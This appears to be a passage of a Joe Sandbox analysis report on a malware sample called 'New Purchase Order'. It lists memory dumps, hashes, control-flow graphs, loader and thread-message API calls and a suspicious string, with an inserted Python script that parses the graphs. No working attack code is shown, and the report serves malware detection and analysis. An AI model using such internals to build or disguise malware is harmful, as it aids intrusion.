                          • Source File: 00000000.00000002.1694595355.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2a20000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: de6bc4533848ee76562be7167ee24d23a8bc17821c41444faef83180cea61531
                          • Instruction ID: ee15f39e2c4cd52fb9cd8cd106c1806d3ed6655334f77f52396bf0937e8a83e8
                          • Opcode Fuzzy Hash: de6bc4533848ee76562be7167ee24d23a8bc17821c41444faef83180cea61531
                          • Instruction Fuzzy Hash: 8FD1E531D1075A8ACB01EB64DA50ADDB7B1FFD5300F10879AE00937655EF70AAC9CB91
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693603879.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c80000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6f8f4b50f4992d0b5ad7eb623f5ddf9276bd32051b0d591b530051832608b158
                          • Instruction ID: e8d2de42cea379f2aaf46f47c5d9d1874d568d6e0c9545e236fbe877773ba685
                          • Opcode Fuzzy Hash: 6f8f4b50f4992d0b5ad7eb623f5ddf9276bd32051b0d591b530051832608b158
                          • Instruction Fuzzy Hash: C3A13A32E00209CFCF05EFA5C88459EB7B2FF85304B25857EE815AB265DB71E956CB40
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d273675acdc2c405ba363ea58ee2aa58eba78b7b007f71fb6b2c045aab378749
                          • Instruction ID: e136e8f97ce6227a7757bc2733cef0bcdd7200ca56db22dd4a8dba7473571468
                          • Opcode Fuzzy Hash: d273675acdc2c405ba363ea58ee2aa58eba78b7b007f71fb6b2c045aab378749
                          • Instruction Fuzzy Hash: EC512B70E002198FDB54DFA9C9805AEFBF2EF89304F24C169D418A7756DB359A42CFA1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 22740ba777b0d5d3da0aec3aa8f536c05e0288b8ac395f96837e3fe9679574ec
                          • Instruction ID: 7adf2438cc9071fb1a2044070ef3f224152d5957685f77fced5d60494513bc7e
                          • Opcode Fuzzy Hash: 22740ba777b0d5d3da0aec3aa8f536c05e0288b8ac395f96837e3fe9679574ec
                          • Instruction Fuzzy Hash: D2513A74E002198FDB14DFA9CA809AEFBF2BF89304F24C169D418A7756DB359941CFA0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a4d4a95335de1280cc061a9be8a437d3194f18280dbd048c6b00dbd5176b8e2b
                          • Instruction ID: 7d7eb2868251c4233d5107e5386f3873d2cb116dbdba1c42aabdb2217cd443fe
                          • Opcode Fuzzy Hash: a4d4a95335de1280cc061a9be8a437d3194f18280dbd048c6b00dbd5176b8e2b
                          • Instruction Fuzzy Hash: 85512D70E012198FCB14DFA9C9805AEFBF2BF89304F24C16AD418A7756DB359A41CFA1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1694595355.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2a20000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1e551f8522cc9235377674fac32d2b4361f9e3dad6bf1d04161e2364528d0ad1
                          • Instruction ID: 3760a476a466a015589e498ee4626fc3835deec94a844e6bb3c18747801efd5f
                          • Opcode Fuzzy Hash: 1e551f8522cc9235377674fac32d2b4361f9e3dad6bf1d04161e2364528d0ad1
                          • Instruction Fuzzy Hash: 2311A771E117289BEB18CF6B8C4078EFBF3AFC9700F04C5AAD408AA254EB3019458F51

                          Execution Graph

                          Execution Coverage: 1.2%
                          Dynamic/Decrypted Code Coverage: 4.3%
                          Signature Coverage: 6.7%
                          Total number of Nodes: 163
                          Total number of Limit Nodes: 14
                          execution_graph: rendered call-graph node/edge data (node ids and addresses) omitted here; API nodes present in the graph: NtClose, RtlAllocateHeap, RtlFreeHeap, LdrInitializeThunk, LdrLoadDll, PostThreadMessageW, ExitProcess

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 197 417733-41774f 198 417757-41775c 197->198 199 417752 call 42f333 197->199 200 417762-417770 call 42f933 198->200 201 41775e-417761 198->201 199->198 204 417780-417791 call 42dcb3 200->204 205 417772-41777d call 42fbd3 200->205 210 417793-4177a7 LdrLoadDll 204->210 211 4177aa-4177ad 204->211 205->204 210->211
                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004177A5
                          Memory Dump Source
                          • Source File: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          • Opcode ID: 695220c7de908a7325642339f6d976c34b7cf8201cc9d60be99d785a75aec0d5
                          • Instruction ID: 8e2604fe3315099ce7e6592766d58e4e85df4a541fcdf6f6d68356c2e9832f5c
                          • Opcode Fuzzy Hash: 695220c7de908a7325642339f6d976c34b7cf8201cc9d60be99d785a75aec0d5
                          • Instruction Fuzzy Hash: CE0152B5E4020DA7DB10DBA1DC42FDEB3789B54308F4081A6E91897281F635EB488B95

                          Control-flow Graph

                          control_flow_graph 238 42c593-42c5cc call 404773 call 42d7c3 NtClose
                          APIs
                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C5C7
                          Memory Dump Source
                          • Source File: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: 818853954403b0610952d6fd8e92de2fb837736f4d0c203e1f11f03a27760536
                          • Instruction ID: 4730e45dc8a455a10bbaf9a925c332d30bf1f4e4369036d8bfc9a482ac9e8ca9
                          • Opcode Fuzzy Hash: 818853954403b0610952d6fd8e92de2fb837736f4d0c203e1f11f03a27760536
                          • Instruction Fuzzy Hash: 30E046766102147BD220BB6ADC41F9B77ACEFC5B14F40441AFA18A7281C676BA1087A8

                          Control-flow Graph

                          control_flow_graph 252 1172b60-1172b6c LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 7aebf4c940c22565cc29f1d272763d2f8e796c9bfefeda14350d28faae302146
                          • Instruction ID: d9fdf5ad7e9440e9388ffef92a35ea2c03a56d9344a9d17c3742ebba62664d25
                          • Opcode Fuzzy Hash: 7aebf4c940c22565cc29f1d272763d2f8e796c9bfefeda14350d28faae302146
                          • Instruction Fuzzy Hash: 5D90026120240003410971584554616900B97E0301B95C021E1015594DC62589916625

                          Control-flow Graph

                          control_flow_graph 254 1172df0-1172dfc LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 4d4061570efd80a3cc4aa4f15102cf8b13808ac85b3651ffa0608c380bcd5e67
                          • Instruction ID: 63756e7fd5da4fd36a3f1182157030af8d747adf4f309803bfa934bb0df512fc
                          • Opcode Fuzzy Hash: 4d4061570efd80a3cc4aa4f15102cf8b13808ac85b3651ffa0608c380bcd5e67
                          • Instruction Fuzzy Hash: B390023120140413D11571584644707500A97D0341FD5C412A042555CDD7568A52A621

                          Control-flow Graph

                          control_flow_graph 253 1172c70-1172c7c LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 36ba8ce39f5fc548fe1fc40b651a6753097e36345136d29a8f0e095ec267921d
                          • Instruction ID: 12584dcfc6e0ebf2ec5221abe288403f392952b7b3806c6cd67449f86981811b
                          • Opcode Fuzzy Hash: 36ba8ce39f5fc548fe1fc40b651a6753097e36345136d29a8f0e095ec267921d
                          • Instruction Fuzzy Hash: C790023120148802D1147158854474A500697D0301F99C411A442565CDC79589917621
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: ed6318108bea49f66465e2b3bad4e036d5011da3cec79e6d56d33c2bb0003c88
                          • Instruction ID: 4906bf1bc05195010159c2c7849f14b1f4edd5181bee2e47cd6cbabfdcd530a4
                          • Opcode Fuzzy Hash: ed6318108bea49f66465e2b3bad4e036d5011da3cec79e6d56d33c2bb0003c88
                          • Instruction Fuzzy Hash: 9390023160550402D10471584654706600697D0301FA5C411A042556CDC7958A516AA2

                          Control-flow Graph

                          control_flow_graph 0 413e32-413e3b 1 413ea2-413ebf 0->1 2 413e3d-413e40 0->2 3 413ec1-413ec8 1->3 4 413f1a-413f21 1->4 5 413e12-413e17 2->5 6 413e42-413e51 2->6 7 413eca-413ecc 3->7 8 413f3d-413f42 3->8 9 413f25 4->9 5->0 6->0 10 413e53-413e79 6->10 11 413ecd-413ed4 7->11 14 413f60-413f71 8->14 15 413f44-413f5e 8->15 12 413fa4-413fe2 call 42e6d3 call 42f0e3 call 417733 call 4046e3 9->12 13 413f27 9->13 16 413e7b-413e9f 10->16 17 413ede 10->17 11->9 19 413ed6-413eda 11->19 22 413fe6-41400d call 424e13 12->22 13->11 20 413f2a-413f3b 13->20 21 413f73-413f7a 14->21 14->22 15->14 16->1 19->17 20->8 21->12 31 41402d-414033 22->31 32 41400f-41401e PostThreadMessageW 22->32 32->31 34 414020-41402a 32->34 34->31
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 3h8t0-08$3h8t0-08$a~V
                          • API String ID: 0-2215303234
                          • Opcode ID: 81d29a8e1ef3792b9a479a4fc0f87079d8a20a8fd8b90cc9f61c1d646faaf081
                          • Instruction ID: 5f72fba8100ebba8870b20796ede5c15298c30b13232037c41d5cf2924e7c9ec
                          • Opcode Fuzzy Hash: 81d29a8e1ef3792b9a479a4fc0f87079d8a20a8fd8b90cc9f61c1d646faaf081
                          • Instruction Fuzzy Hash: EC510232D482996FCB12CF708CC2DDEBFB9DE42345B4840ADE4446B242D6298E07C7D5
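
The `control_flow_graph` lines in this section are a flattened edge list: a decimal block id followed by its address or address range, optional `call <addr>` entries for calls into other functions of the unpacked image, bare API names (LdrLoadDll, NtClose, PostThreadMessageW) for resolved imports, and `<id>-><id>` edges. The Python below is an added example and is not part of the Joe Sandbox report or of its tooling: it parses that format, lists the APIs reachable from a function's entry block, returns the shortest block path to a given API call, and cross-references functions through their `call` targets. The two embedded graphs are copied verbatim from this report (the LdrLoadDll wrapper at 417733 above, and the 413e32 function listed just above, whose block 413fa4 calls 417733 and whose block 41400f calls PostThreadMessageW). The token grammar is inferred from the report text rather than taken from a published Joe Sandbox format, so treat it as an assumption.

```python
"""Parser for the flattened 'control_flow_graph' lines in a Joe Sandbox report (added
example, not report or Joe Sandbox code; the grammar is inferred from the text)."""
import re
from collections import deque
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")              # <id>-><id>
ADDR_RE = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")  # <addr> or <addr>-<addr>
API_RE = re.compile(r"^[A-Z]\w*$")                   # resolved API names are capitalised
# Both graphs are copied verbatim from this report (417733 = LdrLoadDll wrapper, 413e32 = caller).
CFG_LDRLOADDLL = (
    "control_flow_graph 197 417733-41774f 198 417757-41775c 197->198 199 417752 call 42f333 "
    "197->199 200 417762-417770 call 42f933 198->200 201 41775e-417761 198->201 199->198 "
    "204 417780-417791 call 42dcb3 200->204 205 417772-41777d call 42fbd3 200->205 "
    "210 417793-4177a7 LdrLoadDll 204->210 211 4177aa-4177ad 204->211 205->204 210->211"
)
CFG_POSTTHREADMESSAGE = (
    "control_flow_graph 0 413e32-413e3b 1 413ea2-413ebf 0->1 2 413e3d-413e40 0->2 "
    "3 413ec1-413ec8 1->3 4 413f1a-413f21 1->4 5 413e12-413e17 2->5 6 413e42-413e51 2->6 "
    "7 413eca-413ecc 3->7 8 413f3d-413f42 3->8 9 413f25 4->9 5->0 6->0 10 413e53-413e79 6->10 "
    "11 413ecd-413ed4 7->11 14 413f60-413f71 8->14 15 413f44-413f5e 8->15 "
    "12 413fa4-413fe2 call 42e6d3 call 42f0e3 call 417733 call 4046e3 9->12 13 413f27 9->13 "
    "16 413e7b-413e9f 10->16 17 413ede 10->17 11->9 19 413ed6-413eda 11->19 "
    "22 413fe6-41400d call 424e13 12->22 13->11 20 413f2a-413f3b 13->20 21 413f73-413f7a 14->21 "
    "14->22 15->14 16->1 19->17 20->8 21->12 31 41402d-414033 22->31 "
    "32 41400f-41401e PostThreadMessageW 22->32 32->31 34 414020-41402a 32->34 34->31"
)

@dataclass
class Block:
    start: str                                       # first address of the block, hex
    calls: List[str] = field(default_factory=list)   # internal 'call <addr>' targets
    apis: List[str] = field(default_factory=list)    # resolved APIs called from here

@dataclass
class Cfg:
    blocks: Dict[int, Block] = field(default_factory=dict)
    succ: Dict[int, List[int]] = field(default_factory=dict)  # successors, report order
    entry: Optional[int] = None                               # first block listed

def parse_cfg(text: str) -> Cfg:
    g, cur, expect = Cfg(), None, None   # expect: a pending block id, or "call"
    for tok in text.split():
        if tok == "control_flow_graph":
            continue
        if expect is not None:           # the token after an id or 'call' is an address
            if not ADDR_RE.match(tok):
                raise ValueError(f"expected an address, got {tok!r}")
            if expect == "call":
                cur.calls.append(tok)
            else:                        # new block; keep the start of its address range
                cur = g.blocks[expect] = Block(tok.split("-")[0])
                g.entry = expect if g.entry is None else g.entry
            expect = None
        elif (m := EDGE_RE.match(tok)):
            g.succ.setdefault(int(m[1]), []).append(int(m[2]))
        elif tok.isdigit():
            expect = int(tok)
        elif tok == "call" and cur is not None:
            expect = "call"
        elif API_RE.match(tok) and cur is not None:
            cur.apis.append(tok)
        else:
            raise ValueError(f"unexpected token {tok!r}")
    if expect is not None:
        raise ValueError("truncated graph: dangling block id or 'call'")
    return g

def bfs(g: Cfg) -> Dict[int, Optional[int]]:   # reachable block id -> its BFS parent
    parent: Dict[int, Optional[int]] = {g.entry: None}
    queue = deque([g.entry])
    while queue:
        n = queue.popleft()
        for d in g.succ.get(n, []):
            if d not in parent:
                parent[d] = n
                queue.append(d)
    return parent

def reachable_apis(g: Cfg) -> Set[str]:
    return {a for b in bfs(g) if b in g.blocks for a in g.blocks[b].apis}

def call_targets(g: Cfg) -> Set[str]:
    return {c for b in g.blocks.values() for c in b.calls}

def path_to_api(g: Cfg, api: str) -> Optional[List[int]]:
    parent = bfs(g)                       # shortest path from entry to the nearest `api` call
    hits = [b for b in parent if b in g.blocks and api in g.blocks[b].apis]
    if not hits:                          # parent is in BFS discovery order: hits[0] is nearest
        return None
    n, path = hits[0], []
    while n is not None:
        path.append(n)
        n = parent[n]
    return path[::-1]

def callers_of(graphs: List[Cfg], func_addr: str) -> List[str]:
    return sorted(g.blocks[g.entry].start for g in graphs if func_addr in call_targets(g))
```

Run over the two graphs, `path_to_api(g2, "PostThreadMessageW")` returns blocks [0, 1, 3, 8, 14, 22, 32], i.e. 413e32, 413ea2, 413ec1, 413f3d, 413f60, 413fe6, 41400f, and `callers_of([g1, g2], "417733")` returns ["413e32"], tying the PostThreadMessageW function to the LdrLoadDll wrapper through the `call 417733` in block 413fa4. A line that ends in a dangling id or `call`, which is how a graph cut off by page extraction shows up, is rejected with a ValueError rather than silently producing a partial graph.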

                          Control-flow Graph

                          APIs
                          • PostThreadMessageW.USER32(3h8t0-08,00000111,00000000,00000000), ref: 0041401A
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                          Yara matches
                          Similarity
                          • API ID: MessagePostThread
                          • String ID: 3h8t0-08$3h8t0-08
                          • API String ID: 1836367815-1947605396
                          • Opcode ID: 6bcb1862a996d30975c64d4a1bb3983db3ea12b872ae8d1a2c4248d6048350d8
                          • Instruction ID: e1e66dc98035f04d2431884f0e0db6d51c4b26c5f5f1261c7f2f59727122a13f
                          • Opcode Fuzzy Hash: 6bcb1862a996d30975c64d4a1bb3983db3ea12b872ae8d1a2c4248d6048350d8
                          • Instruction Fuzzy Hash: 600104B1D0021C7AEB11AAE29C81DEF7B7CDF80398F408069FA04A7241D6784E068BB5

                          Control-flow Graph

                          control_flow_graph 51 413f9f-41401e PostThreadMessageW 53 414020-41402a 51->53 54 41402d-414033 51->54 53->54
                          APIs
                          • PostThreadMessageW.USER32(3h8t0-08,00000111,00000000,00000000), ref: 0041401A
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                          Yara matches
                          Similarity
                          • API ID: MessagePostThread
                          • String ID: 3h8t0-08$3h8t0-08
                          • API String ID: 1836367815-1947605396
                          • Opcode ID: 135beeca1b74d19290d0d057e79e408ff938a006e35054ead9790b99f903ef45
                          • Instruction ID: 1603f725fde6bf5af95b6af14f59adfb275f0ca4856cf2d9dab87d41540ea272
                          • Opcode Fuzzy Hash: 135beeca1b74d19290d0d057e79e408ff938a006e35054ead9790b99f903ef45
                          • Instruction Fuzzy Hash: D6D0A732A4510865831355E56C41CFE7F7CD9C6755B0001A7EE04C4140F609491716E2

                          Control-flow Graph

                          control_flow_graph 212 417726-41772e 213 417730-41775c call 42f333 212->213 214 417793-4177a7 LdrLoadDll 212->214 218 417762-417770 call 42f933 213->218 219 41775e-417761 213->219 215 4177aa-4177ad 214->215 222 417780-417791 call 42dcb3 218->222 223 417772-41777d call 42fbd3 218->223 222->214 222->215 223->222
                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004177A5
                          Memory Dump Source
                          • Source File: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          • Opcode ID: 65f8a6c095fa10727bab02ecd6e11e6f0f6e72e2c6352eb367b5a389209ad39c
                          • Instruction ID: 9cb1692463f57b7dfc76d45307d73cb454a5d3a2701c0a14866b4d9e4b00da90
                          • Opcode Fuzzy Hash: 65f8a6c095fa10727bab02ecd6e11e6f0f6e72e2c6352eb367b5a389209ad39c
                          • Instruction Fuzzy Hash: 7CF0B475E4410DABDF10DAD4D881FDDB7B5EB54318F00C2E6ED1C9B280E531EA498B90

                          Control-flow Graph

                          control_flow_graph 233 42c8f3-42c934 call 404773 call 42d7c3 RtlFreeHeap
                          APIs
                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,204889F0,00000007,00000000,00000004,00000000,00416FB5,000000F4), ref: 0042C92F
                          Memory Dump Source
                          • Source File: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID:
                          • API String ID: 3298025750-0
                          • Opcode ID: 86d96a3a7410ab6ab211053b4fea2199c90ade22f87b5ad2487026e45bc71ae6
                          • Instruction ID: 7b60794ad80a06acb647eca91f5e56653821d3cfb1d91a0d0caff21413609de5
                          • Opcode Fuzzy Hash: 86d96a3a7410ab6ab211053b4fea2199c90ade22f87b5ad2487026e45bc71ae6
                          • Instruction Fuzzy Hash: 3BE06DB22042047BD610EF59EC41EDB77ACDFC5710F00441AF908A7281DB75B9108BB8

                          Control-flow Graph

                          control_flow_graph 228 42c8a3-42c8e7 call 404773 call 42d7c3 RtlAllocateHeap
                          APIs
                          • RtlAllocateHeap.NTDLL(?,0041E52E,?,?,00000000,?,0041E52E,?,?,?), ref: 0042C8E2
                          Memory Dump Source
                          • Source File: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: f603a91aafff13fe73b5f4fbf87c402e93bd50f142d50c53e52984b161c26a19
                          • Instruction ID: 75f7dc53d552a5dc80399bc2a89f24ad6a6ecd643c57ce83a987320a35da5cda
                          • Opcode Fuzzy Hash: f603a91aafff13fe73b5f4fbf87c402e93bd50f142d50c53e52984b161c26a19
                          • Instruction Fuzzy Hash: 95E06DB12042047BD610EF69EC41EAB37ACDFC5710F004419FE08A7242D770B9148AB9

                          Control-flow Graph

                          control_flow_graph 243 42c943-42c97f call 404773 call 42d7c3 ExitProcess
                          APIs
                          • ExitProcess.KERNEL32(?,00000000,00000000,?,7D282D94,?,?,7D282D94), ref: 0042C97A
                          Memory Dump Source
                          • Source File: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID:
                          • API String ID: 621844428-0
                          • Opcode ID: 52f014dffe07f1b75dafc72ee9e052d85fafd1d86f3f1a40ae16dcff4a33ecd6
                          • Instruction ID: 682fffa712135dc736fe9070f12072bcd6a9e54f8752c83740501f4c0056a1d0
                          • Opcode Fuzzy Hash: 52f014dffe07f1b75dafc72ee9e052d85fafd1d86f3f1a40ae16dcff4a33ecd6
                          • Instruction Fuzzy Hash: BEE046766402147BD620AB6AEC42F9B776CDFC5714F40841AFA08A7241CA74BA0587B8

                          Control-flow Graph

                          control_flow_graph 248 1172c0a-1172c0f 249 1172c11-1172c18 248->249 250 1172c1f-1172c26 LdrInitializeThunk 248->250
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 602256cd8125a1c08e55479d784888a33d626a111dbe9dd60da4e5cb77bd214d
                          • Instruction ID: 69b80a47a956ff265647d40ed8c76c50f6b2576196c2c32d41ba07d2277e0a37
                          • Opcode Fuzzy Hash: 602256cd8125a1c08e55479d784888a33d626a111dbe9dd60da4e5cb77bd214d
                          • Instruction Fuzzy Hash: C7B09B719015C5C5DA15F7644708717791577D0701F65C061D3030655F4738C1D1E675
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-2160512332
                          • Opcode ID: 95fef494bf873a445176d833e969a8ff272d2d578f045ffb9b56561843fe8aa8
                          • Instruction ID: beed454ef2577ef9899c85f85cc66970771ab7ead898c4c1113ead54b31d794d
                          • Opcode Fuzzy Hash: 95fef494bf873a445176d833e969a8ff272d2d578f045ffb9b56561843fe8aa8
                          • Instruction Fuzzy Hash: 9E92A071604742AFE729DF29C884FABB7E8BB88754F04492DFA94D7250D770E848CB52
                          Strings
                          • Invalid debug info address of this critical section, xrefs: 011A54B6
                          • Thread is in a state in which it cannot own a critical section, xrefs: 011A5543
                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011A540A, 011A5496, 011A5519
                          • Critical section address., xrefs: 011A5502
                          • corrupted critical section, xrefs: 011A54C2
                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011A54CE
                          • Critical section debug info address, xrefs: 011A541F, 011A552E
                          • Critical section address, xrefs: 011A5425, 011A54BC, 011A5534
                          • undeleted critical section in freed memory, xrefs: 011A542B
                          • Thread identifier, xrefs: 011A553A
                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011A54E2
                          • double initialized or corrupted critical section, xrefs: 011A5508
                          • Address of the debug info found in the active list., xrefs: 011A54AE, 011A54FA
                          • 8, xrefs: 011A52E3
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                          • API String ID: 0-2368682639
                          • Opcode ID: 8f98c95e747f3762e7e6907f48e4a54ee4eb8777c6110ce041ee28dbd3b88c95
                          • Instruction ID: c5f611a99c7add780a3efd322ce08d074a25578b7d21897e3cc7bfa2d10f1672
                          • Opcode Fuzzy Hash: 8f98c95e747f3762e7e6907f48e4a54ee4eb8777c6110ce041ee28dbd3b88c95
                          • Instruction Fuzzy Hash: D381BDB5A44358EFDB68CF99C844BAEBBBAFB48704F548129F504B7640D371A941CB60
                          Strings
                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 011A2602
                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 011A2409
                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 011A2506
                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 011A2412
                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 011A2498
                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011A22E4
                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011A25EB
                          • @, xrefs: 011A259B
